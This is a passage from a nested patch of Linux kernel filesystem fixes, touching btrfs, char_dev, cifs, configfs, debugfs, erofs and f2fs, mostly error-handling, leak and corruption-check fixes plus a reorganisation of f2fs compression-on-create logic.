+ 						args->start - extent_offset,
+ 						0, false);
+ 				ret = btrfs_inc_extent_ref(trans, &ref);
+-				BUG_ON(ret); /* -ENOMEM */
++				if (ret) {
++					btrfs_abort_transaction(trans, ret);
++					break;
++				}
+ 			}
+ 			key.offset = args->start;
+ 		}
+@@ -783,7 +786,10 @@ delete_extent_item:
+ 						key.offset - extent_offset, 0,
+ 						false);
+ 				ret = btrfs_free_extent(trans, &ref);
+-				BUG_ON(ret); /* -ENOMEM */
++				if (ret) {
++					btrfs_abort_transaction(trans, ret);
++					break;
++				}
+ 				args->bytes_found += extent_end - key.offset;
+ 			}
+ 
+diff --git a/fs/char_dev.c b/fs/char_dev.c
+index ba0ded7842a77..3f667292608c0 100644
+--- a/fs/char_dev.c
++++ b/fs/char_dev.c
+@@ -547,7 +547,7 @@ int cdev_device_add(struct cdev *cdev, struct device *dev)
+ 	}
+ 
+ 	rc = device_add(dev);
+-	if (rc)
++	if (rc && dev->devt)
+ 		cdev_del(cdev);
+ 
+ 	return rc;
+diff --git a/fs/cifs/smb2file.c b/fs/cifs/smb2file.c
+index ffbd9a99fc128..ba6cc50af390f 100644
+--- a/fs/cifs/smb2file.c
++++ b/fs/cifs/smb2file.c
+@@ -122,8 +122,8 @@ int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32
+ 		struct smb2_hdr *hdr = err_iov.iov_base;
+ 
+ 		if (unlikely(!err_iov.iov_base || err_buftype == CIFS_NO_BUFFER))
+-			rc = -ENOMEM;
+-		else if (hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
++			goto out;
++		if (hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
+ 			rc = smb2_parse_symlink_response(oparms->cifs_sb, &err_iov,
+ 							 &data->symlink_target);
+ 			if (!rc) {
+diff --git a/fs/configfs/dir.c b/fs/configfs/dir.c
+index d1f9d26322027..ec6519e1ca3bf 100644
+--- a/fs/configfs/dir.c
++++ b/fs/configfs/dir.c
+@@ -316,6 +316,7 @@ static int configfs_create_dir(struct config_item *item, struct dentry *dentry,
+ 	return 0;
+ 
+ out_remove:
++	configfs_put(dentry->d_fsdata);
+ 	configfs_remove_dirent(dentry);
+ 	return PTR_ERR(inode);
+ }
+@@ -382,6 +383,7 @@ int configfs_create_link(struct configfs_dirent *target, struct dentry *parent,
+ 	return 0;
+ 
+ out_remove:
++	configfs_put(dentry->d_fsdata);
+ 	configfs_remove_dirent(dentry);
+ 	return PTR_ERR(inode);
+ }
+diff --git a/fs/debugfs/file.c b/fs/debugfs/file.c
+index ddb3fc258df94..b54f470e0d031 100644
+--- a/fs/debugfs/file.c
++++ b/fs/debugfs/file.c
+@@ -378,8 +378,8 @@ ssize_t debugfs_attr_read(struct file *file, char __user *buf,
+ }
+ EXPORT_SYMBOL_GPL(debugfs_attr_read);
+ 
+-ssize_t debugfs_attr_write(struct file *file, const char __user *buf,
+-			 size_t len, loff_t *ppos)
++static ssize_t debugfs_attr_write_xsigned(struct file *file, const char __user *buf,
++			 size_t len, loff_t *ppos, bool is_signed)
+ {
+ 	struct dentry *dentry = F_DENTRY(file);
+ 	ssize_t ret;
+@@ -387,12 +387,28 @@ ssize_t debugfs_attr_write(struct file *file, const char __user *buf,
+ 	ret = debugfs_file_get(dentry);
+ 	if (unlikely(ret))
+ 		return ret;
+-	ret = simple_attr_write(file, buf, len, ppos);
++	if (is_signed)
++		ret = simple_attr_write_signed(file, buf, len, ppos);
++	else
++		ret = simple_attr_write(file, buf, len, ppos);
+ 	debugfs_file_put(dentry);
+ 	return ret;
+ }
++
++ssize_t debugfs_attr_write(struct file *file, const char __user *buf,
++			 size_t len, loff_t *ppos)
++{
++	return debugfs_attr_write_xsigned(file, buf, len, ppos, false);
++}
+ EXPORT_SYMBOL_GPL(debugfs_attr_write);
+ 
++ssize_t debugfs_attr_write_signed(struct file *file, const char __user *buf,
++			 size_t len, loff_t *ppos)
++{
++	return debugfs_attr_write_xsigned(file, buf, len, ppos, true);
++}
++EXPORT_SYMBOL_GPL(debugfs_attr_write_signed);
++
+ static struct dentry *debugfs_create_mode_unsafe(const char *name, umode_t mode,
+ 					struct dentry *parent, void *value,
+ 					const struct file_operations *fops,
+@@ -738,11 +754,11 @@ static int debugfs_atomic_t_get(void *data, u64 *val)
+ 	*val = atomic_read((atomic_t *)data);
+ 	return 0;
+ }
+-DEFINE_DEBUGFS_ATTRIBUTE(fops_atomic_t, debugfs_atomic_t_get,
++DEFINE_DEBUGFS_ATTRIBUTE_SIGNED(fops_atomic_t, debugfs_atomic_t_get,
+ 			debugfs_atomic_t_set, "%lld\n");
+-DEFINE_DEBUGFS_ATTRIBUTE(fops_atomic_t_ro, debugfs_atomic_t_get, NULL,
++DEFINE_DEBUGFS_ATTRIBUTE_SIGNED(fops_atomic_t_ro, debugfs_atomic_t_get, NULL,
+ 			"%lld\n");
+-DEFINE_DEBUGFS_ATTRIBUTE(fops_atomic_t_wo, NULL, debugfs_atomic_t_set,
++DEFINE_DEBUGFS_ATTRIBUTE_SIGNED(fops_atomic_t_wo, NULL, debugfs_atomic_t_set,
+ 			"%lld\n");
+ 
+ /**
+diff --git a/fs/erofs/fscache.c b/fs/erofs/fscache.c
+index af5ed6b9c54dd..6a792a513d6b8 100644
+--- a/fs/erofs/fscache.c
++++ b/fs/erofs/fscache.c
+@@ -494,7 +494,8 @@ static int erofs_fscache_register_domain(struct super_block *sb)
+ 
+ static
+ struct erofs_fscache *erofs_fscache_acquire_cookie(struct super_block *sb,
+-						    char *name, bool need_inode)
++						   char *name,
++						   unsigned int flags)
+ {
+ 	struct fscache_volume *volume = EROFS_SB(sb)->volume;
+ 	struct erofs_fscache *ctx;
+@@ -516,7 +517,7 @@ struct erofs_fscache *erofs_fscache_acquire_cookie(struct super_block *sb,
+ 	fscache_use_cookie(cookie, false);
+ 	ctx->cookie = cookie;
+ 
+-	if (need_inode) {
++	if (flags & EROFS_REG_COOKIE_NEED_INODE) {
+ 		struct inode *const inode = new_inode(sb);
+ 
+ 		if (!inode) {
+@@ -554,14 +555,15 @@ static void erofs_fscache_relinquish_cookie(struct erofs_fscache *ctx)
+ 
+ static
+ struct erofs_fscache *erofs_fscache_domain_init_cookie(struct super_block *sb,
+-		char *name, bool need_inode)
++						       char *name,
++						       unsigned int flags)
+ {
+ 	int err;
+ 	struct inode *inode;
+ 	struct erofs_fscache *ctx;
+ 	struct erofs_domain *domain = EROFS_SB(sb)->domain;
+ 
+-	ctx = erofs_fscache_acquire_cookie(sb, name, need_inode);
++	ctx = erofs_fscache_acquire_cookie(sb, name, flags);
+ 	if (IS_ERR(ctx))
+ 		return ctx;
+ 
+@@ -589,7 +591,8 @@ out:
+ 
+ static
+ struct erofs_fscache *erofs_domain_register_cookie(struct super_block *sb,
+-						   char *name, bool need_inode)
++						   char *name,
++						   unsigned int flags)
+ {
+ 	struct inode *inode;
+ 	struct erofs_fscache *ctx;
+@@ -602,23 +605,30 @@ struct erofs_fscache *erofs_domain_register_cookie(struct super_block *sb,
+ 		ctx = inode->i_private;
+ 		if (!ctx || ctx->domain != domain || strcmp(ctx->name, name))
+ 			continue;
+-		igrab(inode);
++		if (!(flags & EROFS_REG_COOKIE_NEED_NOEXIST)) {
++			igrab(inode);
++		} else {
++			erofs_err(sb, "%s already exists in domain %s", name,
++				  domain->domain_id);
++			ctx = ERR_PTR(-EEXIST);
++		}
+ 		spin_unlock(&psb->s_inode_list_lock);
+ 		mutex_unlock(&erofs_domain_cookies_lock);
+ 		return ctx;
+ 	}
+ 	spin_unlock(&psb->s_inode_list_lock);
+-	ctx = erofs_fscache_domain_init_cookie(sb, name, need_inode);
++	ctx = erofs_fscache_domain_init_cookie(sb, name, flags);
+ 	mutex_unlock(&erofs_domain_cookies_lock);
+ 	return ctx;
+ }
+ 
+ struct erofs_fscache *erofs_fscache_register_cookie(struct super_block *sb,
+-						    char *name, bool need_inode)
++						    char *name,
++						    unsigned int flags)
+ {
+ 	if (EROFS_SB(sb)->domain_id)
+-		return erofs_domain_register_cookie(sb, name, need_inode);
+-	return erofs_fscache_acquire_cookie(sb, name, need_inode);
++		return erofs_domain_register_cookie(sb, name, flags);
++	return erofs_fscache_acquire_cookie(sb, name, flags);
+ }
+ 
+ void erofs_fscache_unregister_cookie(struct erofs_fscache *ctx)
+@@ -647,6 +657,7 @@ int erofs_fscache_register_fs(struct super_block *sb)
+ 	int ret;
+ 	struct erofs_sb_info *sbi = EROFS_SB(sb);
+ 	struct erofs_fscache *fscache;
++	unsigned int flags;
+ 
+ 	if (sbi->domain_id)
+ 		ret = erofs_fscache_register_domain(sb);
+@@ -655,8 +666,20 @@ int erofs_fscache_register_fs(struct super_block *sb)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* acquired domain/volume will be relinquished in kill_sb() on error */
+-	fscache = erofs_fscache_register_cookie(sb, sbi->fsid, true);
++	/*
++	 * When shared domain is enabled, using NEED_NOEXIST to guarantee
++	 * the primary data blob (aka fsid) is unique in the shared domain.
++	 *
++	 * For non-shared-domain case, fscache_acquire_volume() invoked by
++	 * erofs_fscache_register_volume() has already guaranteed
++	 * the uniqueness of primary data blob.
++	 *
++	 * Acquired domain/volume will be relinquished in kill_sb() on error.
++	 */
++	flags = EROFS_REG_COOKIE_NEED_INODE;
++	if (sbi->domain_id)
++		flags |= EROFS_REG_COOKIE_NEED_NOEXIST;
++	fscache = erofs_fscache_register_cookie(sb, sbi->fsid, flags);
+ 	if (IS_ERR(fscache))
+ 		return PTR_ERR(fscache);
+ 
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index 05dc686277220..e51f27b6bde15 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -604,13 +604,18 @@ static inline int z_erofs_load_lzma_config(struct super_block *sb,
+ }
+ #endif	/* !CONFIG_EROFS_FS_ZIP */
+ 
++/* flags for erofs_fscache_register_cookie() */
++#define EROFS_REG_COOKIE_NEED_INODE	1
++#define EROFS_REG_COOKIE_NEED_NOEXIST	2
++
+ /* fscache.c */
+ #ifdef CONFIG_EROFS_FS_ONDEMAND
+ int erofs_fscache_register_fs(struct super_block *sb);
+ void erofs_fscache_unregister_fs(struct super_block *sb);
+ 
+ struct erofs_fscache *erofs_fscache_register_cookie(struct super_block *sb,
+-						     char *name, bool need_inode);
++						    char *name,
++						    unsigned int flags);
+ void erofs_fscache_unregister_cookie(struct erofs_fscache *fscache);
+ 
+ extern const struct address_space_operations erofs_fscache_access_aops;
+@@ -623,7 +628,8 @@ static inline void erofs_fscache_unregister_fs(struct super_block *sb) {}
+ 
+ static inline
+ struct erofs_fscache *erofs_fscache_register_cookie(struct super_block *sb,
+-						     char *name, bool need_inode)
++						     char *name,
++						     unsigned int flags)
+ {
+ 	return ERR_PTR(-EOPNOTSUPP);
+ }
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index 1c7dcca702b3e..481788c24a68b 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -245,7 +245,7 @@ static int erofs_init_device(struct erofs_buf *buf, struct super_block *sb,
+ 	}
+ 
+ 	if (erofs_is_fscache_mode(sb)) {
+-		fscache = erofs_fscache_register_cookie(sb, dif->path, false);
++		fscache = erofs_fscache_register_cookie(sb, dif->path, 0);
+ 		if (IS_ERR(fscache))
+ 			return PTR_ERR(fscache);
+ 		dif->fscache = fscache;
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index b792d424d774c..cf4871834ebb2 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -488,7 +488,8 @@ static int z_erofs_register_pcluster(struct z_erofs_decompress_frontend *fe)
+ 	struct erofs_workgroup *grp;
+ 	int err;
+ 
+-	if (!(map->m_flags & EROFS_MAP_ENCODED)) {
++	if (!(map->m_flags & EROFS_MAP_ENCODED) ||
++	    (!ztailpacking && !(map->m_pa >> PAGE_SHIFT))) {
+ 		DBG_BUGON(1);
+ 		return -EFSCORRUPTED;
+ 	}
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index 0bb66927e3d06..e6d5d7a18fb06 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -694,10 +694,15 @@ static int z_erofs_do_map_blocks(struct inode *inode,
+ 		map->m_pa = blknr_to_addr(m.pblk);
+ 		err = z_erofs_get_extent_compressedlen(&m, initial_lcn);
+ 		if (err)
+-			goto out;
++			goto unmap_out;
+ 	}
+ 
+ 	if (m.headtype == Z_EROFS_VLE_CLUSTER_TYPE_PLAIN) {
++		if (map->m_llen > map->m_plen) {
++			DBG_BUGON(1);
++			err = -EFSCORRUPTED;
++			goto unmap_out;
++		}
+ 		if (vi->z_advise & Z_EROFS_ADVISE_INTERLACED_PCLUSTER)
+ 			map->m_algorithmformat =
+ 				Z_EROFS_COMPRESSION_INTERLACED;
+@@ -718,14 +723,12 @@ static int z_erofs_do_map_blocks(struct inode *inode,
+ 		if (!err)
+ 			map->m_flags |= EROFS_MAP_FULL_MAPPED;
+ 	}
++
+ unmap_out:
+ 	erofs_unmap_metabuf(&m.map->buf);
+-
+-out:
+ 	erofs_dbg("%s, m_la %llu m_pa %llu m_llen %llu m_plen %llu m_flags 0%o",
+ 		  __func__, map->m_la, map->m_pa,
+ 		  map->m_llen, map->m_plen, map->m_flags);
+-
+ 	return err;
+ }
+ 
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index d315c2de136f2..74d3f2d2271f3 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -346,7 +346,7 @@ static int zstd_init_compress_ctx(struct compress_ctx *cc)
+ 	if (!level)
+ 		level = F2FS_ZSTD_DEFAULT_CLEVEL;
+ 
+-	params = zstd_get_params(F2FS_ZSTD_DEFAULT_CLEVEL, cc->rlen);
++	params = zstd_get_params(level, cc->rlen);
+ 	workspace_size = zstd_cstream_workspace_bound(&params.cParams);
+ 
+ 	workspace = f2fs_kvmalloc(F2FS_I_SB(cc->inode),
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index e6355a5683b75..8b9f0b3c77232 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -2974,7 +2974,7 @@ static inline void f2fs_change_bit(unsigned int nr, char *addr)
+ /* Flags that should be inherited by new inodes from their parent. */
+ #define F2FS_FL_INHERITED (F2FS_SYNC_FL | F2FS_NODUMP_FL | F2FS_NOATIME_FL | \
+ 			   F2FS_DIRSYNC_FL | F2FS_PROJINHERIT_FL | \
+-			   F2FS_CASEFOLD_FL | F2FS_COMPR_FL | F2FS_NOCOMP_FL)
++			   F2FS_CASEFOLD_FL)
+ 
+ /* Flags that are appropriate for regular files (all but dir-specific ones). */
+ #define F2FS_REG_FLMASK		(~(F2FS_DIRSYNC_FL | F2FS_PROJINHERIT_FL | \
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 82cda12582272..f96bbfa8b3991 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -1915,6 +1915,10 @@ static int f2fs_setflags_common(struct inode *inode, u32 iflags, u32 mask)
+ 			if (!f2fs_disable_compressed_file(inode))
+ 				return -EINVAL;
+ 		} else {
++			/* try to convert inline_data to support compression */
++			int err = f2fs_convert_inline_inode(inode);
++			if (err)
++				return err;
+ 			if (!f2fs_may_compress(inode))
+ 				return -EINVAL;
+ 			if (S_ISREG(inode->i_mode) && F2FS_HAS_BLOCKS(inode))
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 4546e01b2ee08..22c1f876e8c52 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -96,16 +96,6 @@ static int gc_thread_func(void *data)
+ 		 * invalidated soon after by user update or deletion.
+ 		 * So, I'd like to wait some time to collect dirty segments.
+ 		 */
+-		if (sbi->gc_mode == GC_URGENT_HIGH) {
+-			spin_lock(&sbi->gc_urgent_high_lock);
+-			if (sbi->gc_urgent_high_remaining) {
+-				sbi->gc_urgent_high_remaining--;
+-				if (!sbi->gc_urgent_high_remaining)
+-					sbi->gc_mode = GC_NORMAL;
+-			}
+-			spin_unlock(&sbi->gc_urgent_high_lock);
+-		}
+-
+ 		if (sbi->gc_mode == GC_URGENT_HIGH ||
+ 				sbi->gc_mode == GC_URGENT_MID) {
+ 			wait_ms = gc_th->urgent_sleep_time;
+@@ -162,6 +152,15 @@ do_gc:
+ 		/* balancing f2fs's metadata periodically */
+ 		f2fs_balance_fs_bg(sbi, true);
+ next:
++		if (sbi->gc_mode == GC_URGENT_HIGH) {
++			spin_lock(&sbi->gc_urgent_high_lock);
++			if (sbi->gc_urgent_high_remaining) {
++				sbi->gc_urgent_high_remaining--;
++				if (!sbi->gc_urgent_high_remaining)
++					sbi->gc_mode = GC_NORMAL;
++			}
++			spin_unlock(&sbi->gc_urgent_high_lock);
++		}
+ 		sb_end_write(sbi->sb);
+ 
+ 	} while (!kthread_should_stop());
+@@ -1744,8 +1743,9 @@ freed:
+ 				get_valid_blocks(sbi, segno, false) == 0)
+ 			seg_freed++;
+ 
+-		if (__is_large_section(sbi) && segno + 1 < end_segno)
+-			sbi->next_victim_seg[gc_type] = segno + 1;
++		if (__is_large_section(sbi))
++			sbi->next_victim_seg[gc_type] =
++				(segno + 1 < end_segno) ? segno + 1 : NULL_SEGNO;
+ skip:
+ 		f2fs_put_page(sum_page, 0);
+ 	}
+@@ -2133,8 +2133,6 @@ out_unlock:
+ 	if (err)
+ 		return err;
+ 
+-	set_sbi_flag(sbi, SBI_IS_RESIZEFS);
+-
+ 	freeze_super(sbi->sb);
+ 	f2fs_down_write(&sbi->gc_lock);
+ 	f2fs_down_write(&sbi->cp_global_sem);
+@@ -2150,6 +2148,7 @@ out_unlock:
+ 	if (err)
+ 		goto out_err;
+ 
++	set_sbi_flag(sbi, SBI_IS_RESIZEFS);
+ 	err = free_segment_range(sbi, secs, false);
+ 	if (err)
+ 		goto recover_out;
+@@ -2173,6 +2172,7 @@ out_unlock:
+ 		f2fs_commit_super(sbi, false);
+ 	}
+ recover_out:
++	clear_sbi_flag(sbi, SBI_IS_RESIZEFS);
+ 	if (err) {
+ 		set_sbi_flag(sbi, SBI_NEED_FSCK);
+ 		f2fs_err(sbi, "resize_fs failed, should run fsck to repair!");
+@@ -2185,6 +2185,5 @@ out_err:
+ 	f2fs_up_write(&sbi->cp_global_sem);
+ 	f2fs_up_write(&sbi->gc_lock);
+ 	thaw_super(sbi->sb);
+-	clear_sbi_flag(sbi, SBI_IS_RESIZEFS);
+ 	return err;
+ }
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index a389772fd212a..b6c14c9c33a08 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -22,8 +22,163 @@
+ #include "acl.h"
+ #include <trace/events/f2fs.h>
+ 
++static inline int is_extension_exist(const unsigned char *s, const char *sub,
++						bool tmp_ext)
++{
++	size_t slen = strlen(s);
++	size_t sublen = strlen(sub);
++	int i;
++
++	if (sublen == 1 && *sub == '*')
++		return 1;
++
++	/*
++	 * filename format of multimedia file should be defined as:
++	 * "filename + '.' + extension + (optional: '.' + temp extension)".
++	 */
++	if (slen < sublen + 2)
++		return 0;
++
++	if (!tmp_ext) {
++		/* file has no temp extension */
++		if (s[slen - sublen - 1] != '.')
++			return 0;
++		return !strncasecmp(s + slen - sublen, sub, sublen);
++	}
++
++	for (i = 1; i < slen - sublen; i++) {
++		if (s[i] != '.')
++			continue;
++		if (!strncasecmp(s + i + 1, sub, sublen))
++			return 1;
++	}
++
++	return 0;
++}
++
++int f2fs_update_extension_list(struct f2fs_sb_info *sbi, const char *name,
++							bool hot, bool set)
++{
++	__u8 (*extlist)[F2FS_EXTENSION_LEN] = sbi->raw_super->extension_list;
++	int cold_count = le32_to_cpu(sbi->raw_super->extension_count);
++	int hot_count = sbi->raw_super->hot_ext_count;
++	int total_count = cold_count + hot_count;
++	int start, count;
++	int i;
++
++	if (set) {
++		if (total_count == F2FS_MAX_EXTENSION)
++			return -EINVAL;
++	} else {
++		if (!hot && !cold_count)
++			return -EINVAL;
++		if (hot && !hot_count)
++			return -EINVAL;
++	}
++
++	if (hot) {
++		start = cold_count;
++		count = total_count;
++	} else {
++		start = 0;
++		count = cold_count;
++	}
++
++	for (i = start; i < count; i++) {
++		if (strcmp(name, extlist[i]))
++			continue;
++
++		if (set)
++			return -EINVAL;
++
++		memcpy(extlist[i], extlist[i + 1],
++				F2FS_EXTENSION_LEN * (total_count - i - 1));
++		memset(extlist[total_count - 1], 0, F2FS_EXTENSION_LEN);
++		if (hot)
++			sbi->raw_super->hot_ext_count = hot_count - 1;
++		else
++			sbi->raw_super->extension_count =
++						cpu_to_le32(cold_count - 1);
++		return 0;
++	}
++
++	if (!set)
++		return -EINVAL;
++
++	if (hot) {
++		memcpy(extlist[count], name, strlen(name));
++		sbi->raw_super->hot_ext_count = hot_count + 1;
++	} else {
++		char buf[F2FS_MAX_EXTENSION][F2FS_EXTENSION_LEN];
++
++		memcpy(buf, &extlist[cold_count],
++				F2FS_EXTENSION_LEN * hot_count);
++		memset(extlist[cold_count], 0, F2FS_EXTENSION_LEN);
++		memcpy(extlist[cold_count], name, strlen(name));
++		memcpy(&extlist[cold_count + 1], buf,
++				F2FS_EXTENSION_LEN * hot_count);
++		sbi->raw_super->extension_count = cpu_to_le32(cold_count + 1);
++	}
++	return 0;
++}
++
++static void set_compress_new_inode(struct f2fs_sb_info *sbi, struct inode *dir,
++				struct inode *inode, const unsigned char *name)
++{
++	__u8 (*extlist)[F2FS_EXTENSION_LEN] = sbi->raw_super->extension_list;
++	unsigned char (*noext)[F2FS_EXTENSION_LEN] =
++						F2FS_OPTION(sbi).noextensions;
++	unsigned char (*ext)[F2FS_EXTENSION_LEN] = F2FS_OPTION(sbi).extensions;
++	unsigned char ext_cnt = F2FS_OPTION(sbi).compress_ext_cnt;
++	unsigned char noext_cnt = F2FS_OPTION(sbi).nocompress_ext_cnt;
++	int i, cold_count, hot_count;
++
++	if (!f2fs_sb_has_compression(sbi))
++		return;
++
++	if (S_ISDIR(inode->i_mode))
++		goto inherit_comp;
++
++	/* This name comes only from normal files. */
++	if (!name)
++		return;
++
++	/* Don't compress hot files. */
++	f2fs_down_read(&sbi->sb_lock);
++	cold_count = le32_to_cpu(sbi->raw_super->extension_count);
++	hot_count = sbi->raw_super->hot_ext_count;
++	for (i = cold_count; i < cold_count + hot_count; i++)
++		if (is_extension_exist(name, extlist[i], false))
++			break;
++	f2fs_up_read(&sbi->sb_lock);
++	if (i < (cold_count + hot_count))
++		return;
++
++	/* Don't compress unallowed extension. */
++	for (i = 0; i < noext_cnt; i++)
++		if (is_extension_exist(name, noext[i], false))
++			return;
++
++	/* Compress wanting extension. */
++	for (i = 0; i < ext_cnt; i++) {
++		if (is_extension_exist(name, ext[i], false)) {
++			set_compress_context(inode);
++			return;
++		}
++	}
++inherit_comp:
++	/* Inherit the {no-}compression flag in directory */
++	if (F2FS_I(dir)->i_flags & F2FS_NOCOMP_FL) {
++		F2FS_I(inode)->i_flags |= F2FS_NOCOMP_FL;
++		f2fs_mark_inode_dirty_sync(inode, true);
++	} else if (F2FS_I(dir)->i_flags & F2FS_COMPR_FL) {
++		set_compress_context(inode);
++	}
++}
++
+ static struct inode *f2fs_new_inode(struct user_namespace *mnt_userns,
+-						struct inode *dir, umode_t mode)
++						struct inode *dir, umode_t mode,
++						const char *name)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(dir);
+ 	nid_t ino;
+@@ -114,12 +269,8 @@ static struct inode *f2fs_new_inode(struct user_namespace *mnt_userns,
+ 	if (F2FS_I(inode)->i_flags & F2FS_PROJINHERIT_FL)
+ 		set_inode_flag(inode, FI_PROJ_INHERIT);
+ 
+-	if (f2fs_sb_has_compression(sbi)) {
+-		/* Inherit the compression flag in directory */
+-		if ((F2FS_I(dir)->i_flags & F2FS_COMPR_FL) &&
+-					f2fs_may_compress(inode))
+-			set_compress_context(inode);
+-	}
++	/* Check compression first. */
++	set_compress_new_inode(sbi, dir, inode, name);
+ 
+ 	/* Should enable inline_data after compression set */
+ 	if (test_opt(sbi, INLINE_DATA) && f2fs_may_inline_data(inode))
+@@ -153,40 +304,6 @@ fail_drop:
+ 	return ERR_PTR(err);
+ }
+ 
+-static inline int is_extension_exist(const unsigned char *s, const char *sub,
+-						bool tmp_ext)
+-{
+-	size_t slen = strlen(s);
+-	size_t sublen = strlen(sub);
+-	int i;
+-
+-	if (sublen == 1 && *sub == '*')
+-		return 1;
+-
+-	/*
+-	 * filename format of multimedia file should be defined as:
+-	 * "filename + '.' + extension + (optional: '.' + temp extension)".
+-	 */
+-	if (slen < sublen + 2)
+-		return 0;
+-
+-	if (!tmp_ext) {
+-		/* file has no temp extension */
+-		if (s[slen - sublen - 1] != '.')
+-			return 0;
+-		return !strncasecmp(s + slen - sublen, sub, sublen);
+-	}
+-
+-	for (i = 1; i < slen - sublen; i++) {
+-		if (s[i] != '.')
+-			continue;
+-		if (!strncasecmp(s + i + 1, sub, sublen))
+-			return 1;
+-	}
+-
+-	return 0;
+-}
+-
+ /*
+  * Set file's temperature for hot/cold data separation
+  */
+@@ -217,124 +334,6 @@ static inline void set_file_temperature(struct f2fs_sb_info *sbi, struct inode *
+ 		file_set_hot(inode);
+ }
+ 
+-int f2fs_update_extension_list(struct f2fs_sb_info *sbi, const char *name,
+-							bool hot, bool set)
+-{
+-	__u8 (*extlist)[F2FS_EXTENSION_LEN] = sbi->raw_super->extension_list;
+-	int cold_count = le32_to_cpu(sbi->raw_super->extension_count);
+-	int hot_count = sbi->raw_super->hot_ext_count;
+-	int total_count = cold_count + hot_count;
+-	int start, count;
+-	int i;
+-
+-	if (set) {
+-		if (total_count == F2FS_MAX_EXTENSION)
+-			return -EINVAL;
+-	} else {
+-		if (!hot && !cold_count)
+-			return -EINVAL;
+-		if (hot && !hot_count)
+-			return -EINVAL;
+-	}
+-
+-	if (hot) {
+-		start = cold_count;
+-		count = total_count;
+-	} else {
+-		start = 0;
+-		count = cold_count;
+-	}
+-
+-	for (i = start; i < count; i++) {
+-		if (strcmp(name, extlist[i]))
+-			continue;
+-
+-		if (set)
+-			return -EINVAL;
+-
+-		memcpy(extlist[i], extlist[i + 1],
+-				F2FS_EXTENSION_LEN * (total_count - i - 1));
+-		memset(extlist[total_count - 1], 0, F2FS_EXTENSION_LEN);
+-		if (hot)
+-			sbi->raw_super->hot_ext_count = hot_count - 1;
+-		else
+-			sbi->raw_super->extension_count =
+-						cpu_to_le32(cold_count - 1);
+-		return 0;
+-	}
+-
+-	if (!set)
+-		return -EINVAL;
+-
+-	if (hot) {
+-		memcpy(extlist[count], name, strlen(name));
+-		sbi->raw_super->hot_ext_count = hot_count + 1;
+-	} else {
+-		char buf[F2FS_MAX_EXTENSION][F2FS_EXTENSION_LEN];
+-
+-		memcpy(buf, &extlist[cold_count],
+-				F2FS_EXTENSION_LEN * hot_count);
+-		memset(extlist[cold_count], 0, F2FS_EXTENSION_LEN);
+-		memcpy(extlist[cold_count], name, strlen(name));
+-		memcpy(&extlist[cold_count + 1], buf,
+-				F2FS_EXTENSION_LEN * hot_count);
+-		sbi->raw_super->extension_count = cpu_to_le32(cold_count + 1);
+-	}
+-	return 0;
+-}
+-
+-static void set_compress_inode(struct f2fs_sb_info *sbi, struct inode *inode,
+-						const unsigned char *name)
+-{
+-	__u8 (*extlist)[F2FS_EXTENSION_LEN] = sbi->raw_super->extension_list;
+-	unsigned char (*noext)[F2FS_EXTENSION_LEN] = F2FS_OPTION(sbi).noextensions;
+-	unsigned char (*ext)[F2FS_EXTENSION_LEN] = F2FS_OPTION(sbi).extensions;
+-	unsigned char ext_cnt = F2FS_OPTION(sbi).compress_ext_cnt;
+-	unsigned char noext_cnt = F2FS_OPTION(sbi).nocompress_ext_cnt;
+-	int i, cold_count, hot_count;
+-
+-	if (!f2fs_sb_has_compression(sbi) ||
+-			F2FS_I(inode)->i_flags & F2FS_NOCOMP_FL ||
+-			!f2fs_may_compress(inode) ||
+-			(!ext_cnt && !noext_cnt))
+-		return;
+-
+-	f2fs_down_read(&sbi->sb_lock);
+-
+-	cold_count = le32_to_cpu(sbi->raw_super->extension_count);
+-	hot_count = sbi->raw_super->hot_ext_count;
+-
+-	for (i = cold_count; i < cold_count + hot_count; i++) {
+-		if (is_extension_exist(name, extlist[i], false)) {
+-			f2fs_up_read(&sbi->sb_lock);
+-			return;
+-		}
+-	}
+-
+-	f2fs_up_read(&sbi->sb_lock);
+-
+-	for (i = 0; i < noext_cnt; i++) {
+-		if (is_extension_exist(name, noext[i], false)) {
+-			f2fs_disable_compressed_file(inode);
+-			return;
+-		}
+-	}
+-
+-	if (is_inode_flag_set(inode, FI_COMPRESSED_FILE))
+-		return;
+-
+-	for (i = 0; i < ext_cnt; i++) {
+-		if (!is_extension_exist(name, ext[i], false))
+-			continue;
+-
+-		/* Do not use inline_data with compression */
+-		stat_dec_inline_inode(inode);
+-		clear_inode_flag(inode, FI_INLINE_DATA);
+-		set_compress_context(inode);
+-		return;
+-	}
+-}
+-
+ static int f2fs_create(struct user_namespace *mnt_userns, struct inode *dir,
+ 		       struct dentry *dentry, umode_t mode, bool excl)
+ {
+@@ -352,15 +351,13 @@ static int f2fs_create(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, mode);
++	inode = f2fs_new_inode(mnt_userns, dir, mode, dentry->d_name.name);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
